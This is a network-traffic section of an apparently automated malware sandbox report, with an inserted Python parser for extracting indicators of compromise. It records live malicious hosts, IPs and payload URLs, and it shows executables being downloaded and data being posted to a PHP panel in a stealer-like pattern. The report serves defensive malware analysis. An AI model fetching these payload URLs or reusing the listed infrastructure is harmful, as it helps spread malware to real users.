                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Location: https://firstfirecar.com/c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LrD4GZu%2F022yDsciwNEy42D4RzZQ21kBV4LPheNxaj8dM4Y6XGUli4RGYkhn4Uadxe1JGWcBxSOPZp3Y9fHWP55lb3ggED2DXj4Leko%2BnLdL39%2F7UNlQdNmfyymRPk6Qq8%2FM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8825aaf26881631f-LHR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.78/files/setup.exe
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.78:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /files/setup.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.78
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:55 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                  Last-Modified: Fri, 10 May 2024 08:32:14 GMT
                                                                                                                                                                                                                                                                  ETag: "63fa73-618155f6aed8b"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 6552179
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                                                                                                                                • flag-az
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://1xst.ru/tech/upd2.php
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.18.245.58:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /tech/upd2.php HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 1xst.ru
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  104.21.90.14:443
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: realdeepai.org
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Response
HTTP/1.1 307 Temporary Redirect
Date: Sat, 11 May 2024 22:39:55 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://jonathantwo.com/c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YIVCF5h2mAEH94dgjuQr9PgcI0DYPSPVN7j60z0JK6uFOdFpbA4%2FdZVI%2FohHsGpSeULq8O8tBEsctp%2F%2BdTnHKEyQoj8Xp3Zt%2Bejbbjt479brN5rP%2BcIwY47KlbbkPP9Eyg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8825aaf27d3c23b2-LHR
alt-svc: h3=":443"; ma=86400
• flag-us
GET
https://jonathantwo.com/c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe
CasPol.exe
Remote address:
104.21.31.124:443
Request
GET /c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: jonathantwo.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Sat, 11 May 2024 22:39:55 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 4331392
Connection: keep-alive
Last-Modified: Sat, 11 May 2024 21:43:36 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 485
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lTG3kw9tC%2Fu5iHS9D4Ul1XGA64A%2BAzfAS60q%2Fdew9Q1raUOso%2FZNyHZRdsSxpt%2FNkl6gUnAVid71H5HpYYmytbvWmdRVYK%2FpdlZEQR0HzYecrH%2BL72Ezmr8i6qbX7kzm73o%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8825aaf38d4224d8-LHR
alt-svc: h3=":443"; ma=86400
• flag-us
GET
https://jonathantwo.com/c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe
CasPol.exe
Remote address:
104.21.31.124:443
Request
GET /c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: jonathantwo.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Sat, 11 May 2024 22:39:55 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 4331392
Connection: keep-alive
Last-Modified: Sat, 11 May 2024 21:43:36 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 485
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xaAs6L2N6hRJ36BMwhqCe1k3SxgaNsLYEG8cvp7gADr8gU9COvP33RMH8vv1yFmo0pniSILN3uSJ51DOO%2BUoFCnZzr2DZBWbOKZ1ZchoLfo6Gu6s3XKvWPF8zXWR1joJR9U%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8825aaf37f0423f6-LHR
alt-svc: h3=":443"; ma=86400
• flag-us
GET
https://firstfirecar.com/c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe
CasPol.exe
Remote address:
104.21.60.76:443
Request
GET /c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: firstfirecar.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Sat, 11 May 2024 22:39:55 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 4331408
Connection: keep-alive
Last-Modified: Sat, 11 May 2024 21:43:31 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2N0mdXJBeRDwbL8QDSKoLe7LenQVcsnm1WpW2DCeEPwRgWkD8xJ64ErPzeg6cfTVakIS%2F%2ButPlRXgPrVIvW8eANPGdAem8z7C6Iy0ambGOrngtruoHgHUReC8C6U0hw4qYzz"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8825aaf37c1cdd54-LHR
alt-svc: h3=":443"; ma=86400
• flag-us
GET
https://firstfirecar.com/c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe
CasPol.exe
Remote address:
104.21.60.76:443
Request
GET /c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: firstfirecar.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Sat, 11 May 2024 22:39:55 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 4331408
Connection: keep-alive
Last-Modified: Sat, 11 May 2024 21:43:31 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 763
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LxqFkWx2WQhsrjySjrEhg4kSIy%2BMJ1yHXb%2FurqZifouibaGxXm3xpY76N%2FsfMZ78Cl1Dc%2BmEpV7VXPEVAuJg3lVYGEJkNXBW7SYIyct7x5%2BjHteNeRYvyervlrLxco45nDHk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8825aaf37c50654a-LHR
alt-svc: h3=":443"; ma=86400
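The HTTP entries in this report are flat text: a country-flag bullet, the method, the URL, the requesting process, the remote socket, then the raw request and response headers. The example below is added here and is not part of the sandbox report or its tooling; it parses that layout, pulls out host/IP/payload IOCs and flags the patterns visible in the entries above: an executable Content-Type, a 30x Location pointing at an .exe, cleartext HTTP, a request with no recorded response, and CasPol.exe (the signed .NET Framework Code Access Security Policy tool, which has no legitimate reason to download executables) as the requesting process. The sample input is constructed from the page's entries and trimmed to the headers that matter; the https://example.invalid/landing request URL feeding the 307 is an assumption, since the page shows only that redirect's response.

```python
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Constructed sample in the report's HTTP-section layout. Hosts, IPs, paths and
# headers are taken from the report; the example.invalid request URL is assumed.
SAMPLE = """\
• flag-us
GET
https://jonathantwo.com/c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe
CasPol.exe
Remote address:
104.21.31.124:443
Request
GET /c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: jonathantwo.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Content-Type: application/x-ms-dos-executable
Content-Length: 4331392
Server: cloudflare
• flag-us
GET
https://example.invalid/landing
CasPol.exe
Remote address:
104.21.60.76:443
Request
GET /landing HTTP/1.1
Host: example.invalid
Response
HTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Location: https://firstfirecar.com/c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe
Server: cloudflare
• flag-az
GET
http://1xst.ru/tech/upd2.php
CasPol.exe
Remote address:
185.18.245.58:80
Request
GET /tech/upd2.php HTTP/1.1
Host: 1xst.ru
"""

# MIME types that mean a PE was served, whatever the URL extension says.
EXECUTABLE_TYPES = {"application/x-ms-dos-executable", "application/x-msdownload"}
# Windows-signed binaries that should never be the process issuing downloads.
LOLBIN_PROCESSES = {"caspol.exe"}


@dataclass
class HttpEntry:
    flag: str
    method: str
    url: str
    process: str
    remote: str
    request: List[str] = field(default_factory=list)
    response: List[str] = field(default_factory=list)

    def header(self, name: str) -> Optional[str]:
        """Case-insensitive lookup of a response header (first match wins)."""
        for line in self.response:
            key, sep, value = line.partition(":")
            if sep and key.strip().lower() == name.lower():
                return value.strip()
        return None

    @property
    def status(self) -> Optional[int]:
        if self.response and self.response[0].startswith("HTTP/"):
            parts = self.response[0].split()
            if len(parts) >= 2 and parts[1].isdigit():
                return int(parts[1])
        return None  # no response was recorded for this request


def parse_entries(text: str) -> List[HttpEntry]:
    """Split the flat report text into entries; each starts at a '• flag-xx' bullet."""
    lines = [ln.strip() for ln in text.splitlines()]
    entries: List[HttpEntry] = []
    cur: Optional[HttpEntry] = None
    section: Optional[str] = None
    i = 0
    while i < len(lines):
        line = lines[i]
        if line.startswith("• ") and i + 5 < len(lines) and lines[i + 4] == "Remote address:":
            cur = HttpEntry(flag=line[2:], method=lines[i + 1], url=lines[i + 2],
                            process=lines[i + 3], remote=lines[i + 5])
            entries.append(cur)
            section = None
            i += 6
            continue
        if line == "Request":
            section = "request"
        elif line == "Response":
            section = "response"
        elif cur is not None and line:
            (cur.request if section == "request" else cur.response).append(line)
        i += 1
    return entries


def findings(e: HttpEntry) -> List[Tuple[str, str]]:
    """Return (code, detail) pairs for the suspicious traits of one entry."""
    out: List[Tuple[str, str]] = []
    ctype = e.header("Content-Type")
    if ctype and ctype.split(";")[0].strip().lower() in EXECUTABLE_TYPES:
        out.append(("exe_payload", e.url))
    loc = e.header("Location")
    if e.status in (301, 302, 303, 307, 308) and loc and urlparse(loc).path.lower().endswith(".exe"):
        out.append(("exe_redirect", loc))  # the next hop is the payload URL
    if urlparse(e.url).scheme == "http":
        out.append(("cleartext_http", e.url))
    if e.process.lower() in LOLBIN_PROCESSES:
        out.append(("lolbin_process", e.process))
    if not e.response:
        out.append(("no_response", e.url))
    return out


def extract_iocs(entries: List[HttpEntry]) -> dict:
    """Collect hosts, remote IPs and payload URLs (direct hits plus redirect targets)."""
    iocs = {"hosts": set(), "ips": set(), "payload_urls": set()}
    for e in entries:
        host = urlparse(e.url).hostname
        if host:
            iocs["hosts"].add(host)
        iocs["ips"].add(e.remote.rsplit(":", 1)[0])
        for code, detail in findings(e):
            if code in ("exe_payload", "exe_redirect"):
                iocs["payload_urls"].add(detail)
    return iocs


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for entry in parsed:
        print(entry.process, entry.method, entry.url, entry.status, findings(entry))
    print(extract_iocs(parsed))
```

Feeding the report's full HTTP section through `parse_entries` and `extract_iocs` yields the block list for the run (jonathantwo.com, firstfirecar.com, 1xst.ru and the Cloudflare and 185.18.245.58 endpoints); the `lolbin_process` finding is the one worth turning into a host-based rule, since CasPol.exe initiating network connections is anomalous regardless of the destination.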
                                                                                                                                                                                                                                                                • flag-az
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://1xst.ru/tech/upd2.php
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.18.245.58:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /tech/upd2.php HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 1xst.ru
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  64.96.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  64.96.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  90.128.172.185.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  90.128.172.185.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  25.173.189.20.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  25.173.189.20.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  58.245.18.185.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  58.245.18.185.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  45.87.157.20.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  45.87.157.20.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  124.31.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  124.31.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  ipinfo.io
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  ipinfo.io
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  ipinfo.io
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  34.117.186.192
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  download.iolo.net
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  download.iolo.net
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  download.iolo.net
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  iolo0.b-cdn.net
                                                                                                                                                                                                                                                                  iolo0.b-cdn.net
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  185.93.2.244
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  76.60.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  76.60.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  10.66.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  10.66.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
  244.2.93.185.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    244.2.93.185.in-addr.arpa
    IN PTR
  Response
    244.2.93.185.in-addr.arpa
    IN PTR
    185-93-2-244 bunnyinfranet
• flag-ru
  GET http://5.42.66.10/api/bing_release.php
  YPvckKCypmBOW0NpRBKcRmjU.exe
  Remote address: 5.42.66.10:80
  Request
    GET /api/bing_release.php HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
    Host: 5.42.66.10
  Response
    HTTP/1.1 200 OK
    Date: Sat, 11 May 2024 22:40:01 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    X-Powered-By: PHP/8.2.12
    Content-Length: 8
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
• flag-de
  GET http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
  dH6oPXkyyyDL7hNf3xeAvCZ9.exe
  Remote address: 185.172.128.90:80
  Request
    GET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1
    Host: 185.172.128.90
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
  Response
    HTTP/1.0 500 Internal Server Error
    Date: Sat, 11 May 2024 22:40:05 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8
• flag-de
  GET http://185.172.128.228/ping.php?substr=five
  dH6oPXkyyyDL7hNf3xeAvCZ9.exe
  Remote address: 185.172.128.228:80
  Request
    GET /ping.php?substr=five HTTP/1.1
    Host: 185.172.128.228
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
  Response
    HTTP/1.1 200 OK
    Date: Sat, 11 May 2024 22:40:05 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 0
    Content-Type: text/html; charset=UTF-8
• flag-de
  GET http://185.172.128.59/syncUpd.exe
  dH6oPXkyyyDL7hNf3xeAvCZ9.exe
  Remote address: 185.172.128.59:80
  Request
    GET /syncUpd.exe HTTP/1.1
    Host: 185.172.128.59
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
  Response
    HTTP/1.1 200 OK
    Date: Sat, 11 May 2024 22:40:05 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Last-Modified: Sat, 11 May 2024 22:30:01 GMT
    ETag: "3d400-618353166eba2"
    Accept-Ranges: bytes
    Content-Length: 250880
    Content-Type: application/x-msdos-program
• flag-de
  GET http://185.172.128.228/BroomSetup.exe
  dH6oPXkyyyDL7hNf3xeAvCZ9.exe
  Remote address: 185.172.128.228:80
  Request
    GET /BroomSetup.exe HTTP/1.1
    Host: 185.172.128.228
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
  Response
    HTTP/1.1 200 OK
    Date: Sat, 11 May 2024 22:40:06 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
    ETag: "4a4030-613b1bf118700"
    Accept-Ranges: bytes
    Content-Length: 4866096
    Content-Type: application/x-msdos-program
• flag-us
  POST http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
  u2rs.1.exe
  Remote address: 20.157.87.45:80
  Request
    POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
    Connection: keep-alive
    Content-Length: 300
    Host: svc.iolo.com
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: identity
    User-Agent: Mozilla/3.0 (compatible; Indy Library)
  Response
    HTTP/1.1 200 OK
    cache-control: private
    content-length: 256
    content-type: text/html; charset=utf-8
    x-whom: Ioloweb5
    date: Sat, 11 May 2024 22:40:08 GMT
    set-cookie: SERVERID=svc5; path=/
    connection: close
• flag-de
  POST http://185.172.128.150/c698e1bc8a2f5e6d.php
  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DGCGDBGCAAEBFIECGHDG
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 217
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:11 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Content-Length: 156
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJE
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 268
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:11 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Content-Length: 1520
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----BKFBAECBAEGDGDHIEHIJ
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 267
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:11 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Content-Length: 5416
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----FIDGDAKFHIEHJKFHDHDB
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 5295
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:11 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dll
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /b7d0cfdb1d966bdd/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
